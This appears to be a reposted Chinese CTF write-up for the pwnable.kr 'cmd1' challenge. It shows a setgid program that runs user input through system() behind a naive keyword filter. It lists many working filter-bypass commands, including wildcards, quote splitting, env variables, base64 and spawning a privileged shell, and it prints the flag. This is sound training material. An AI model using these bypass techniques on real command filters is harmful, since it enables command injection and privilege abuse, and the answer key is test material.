本文共 3057 字,大约阅读时间需要 10 分钟。
cmd1 - 1 ptMommy! what is PATH environment in Linux?ssh cmd1@pwnable.kr -p2222 (pw:guest)
登陆服务器之后,cmd1有cmd1_pwn的group权限,可以读flag。
cmd1@ubuntu:~$ ls -ltotal 20-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14 2015 cmd1-rw-r--r-- 1 root root 320 Mar 23 2018 cmd1.c-r--r----- 1 root cmd1_pwn 48 Jul 14 2015 flag
本关的代码量不是很大,直接看源码吧。
#include#include int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r += strstr(cmd, "tmp")!=0; return r;}int main(int argc, char* argv[], char** envp){ putenv("PATH=/thankyouverymuch"); if(filter(argv[1])) return 0; system( argv[1] ); return 0;}
给r复制时的反汇编如下:
call _strstr test rax, rax ;// 判断返回值是否为,影响ZF标志位setnz al ;// set if not zero,如果ZF为1,al为0。如果ZF为1,al为1。movzx eax, al ;// 16位扩展为32位,movzx无符号扩展。movsx为有符号扩展add [rbp+var_4], eax ;// 修改r的值
strstr是Standard C Library中的函数,看一下实现。
SYNOPSIS #includechar * strstr(const char *haystack, const char *needle); DESCRIPTION The strstr() function locates the first occurrence of the null-terminated string needle in the null-terminated string haystack. RETURN VALUES If needle is an empty string, haystack is returned; if needle occurs nowhere in haystack,NULL is returned; otherwise a pointer to the first character of the first occurrence of needle is returned.
如果needle为空字符串,strstr返回haystack。如果needle没有出现,返回NULL。否则返回第一次匹配到的子串。
本关调用putenv修改了环境变量PATH,因此原先的命令需要用绝对路径去运行,或者export PATH恢复再使用。此外,filter了argv[1],不能出现flag sh tmp这些字符串。最后调用system执行。本关很明显是要让我们找一些bypass方案了。
总结了一下目前的拿flag姿势。
# 通配符 cat fla* 可以读flagcmd1@ubuntu:~$ ./cmd1 /b"in/cat /home/cmd1/fla*"mommy now I get what PATH environment is for :)# 字符串拼接 'f'la'g' 在bash中还是flagcmd1@ubuntu:~$ echo 'f'la'g'flagcmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/'f'lag"mommy now I get what PATH environment is for :)cmd1@ubuntu:~$ echo 'f'lagflagcmd1@ubuntu:~$ echo "f"lagflagcmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/\"f\"lag"mommy now I get what PATH environment is for :)# env设置环境变量拿flagcmd1@ubuntu:~$ env x='/bin/cat /home/cmd1/flag' ./cmd1 "\$x"mommy now I get what PATH environment is for :)#借助vim来打开文件./cmd1 /usr/bin/vim:e flag# 转义一个不需要转义的字符 如\acmd1@ubuntu:~$ ./cmd1 "/bin/cat fl\ag"mommy now I get what PATH environment is for :)# base64 decodecmd1@ubuntu:~$ ./cmd1 '/bin/cat $(echo "ZmxhZwo=" | /usr/bin/base64 -d)'mommy now I get what PATH environment is for :)# 直接写bash,简单粗暴 by v4r4ncmd1@ubuntu:~$ echo /bin/cat /home/cmd1/flag > /var/lib/php/sessions/asdcmd1@ubuntu:~$ chmod +x /var/lib/php/sessions/asdcmd1@ubuntu:~$ ./cmd1 /var/lib/php/sessions/asdmommy now I get what PATH environment is for :)# more 查看当前目录下所有文件./cmd1 "/bin/more *"...
也有一个不太理解的。/bin/sh有cmd1_pwn权限,/bin/bash没有。
cmd1@ubuntu:~$ ./cmd1 "/bin/bas''h"bash-4.3$ /usr/bin/iduid=1025(cmd1) gid=1025(cmd1) groups=1025(cmd1)bash-4.3$ exitexitcmd1@ubuntu:~$ ./cmd1 "/bin/s''h"$ /usr/bin/iduid=1025(cmd1) gid=1025(cmd1) egid=1026(cmd1_pwn) groups=1026(cmd1_pwn),1025(cmd1)$ /bin/cat flagmommy now I get what PATH environment is for :)
转载地址:http://remli.baihongyu.com/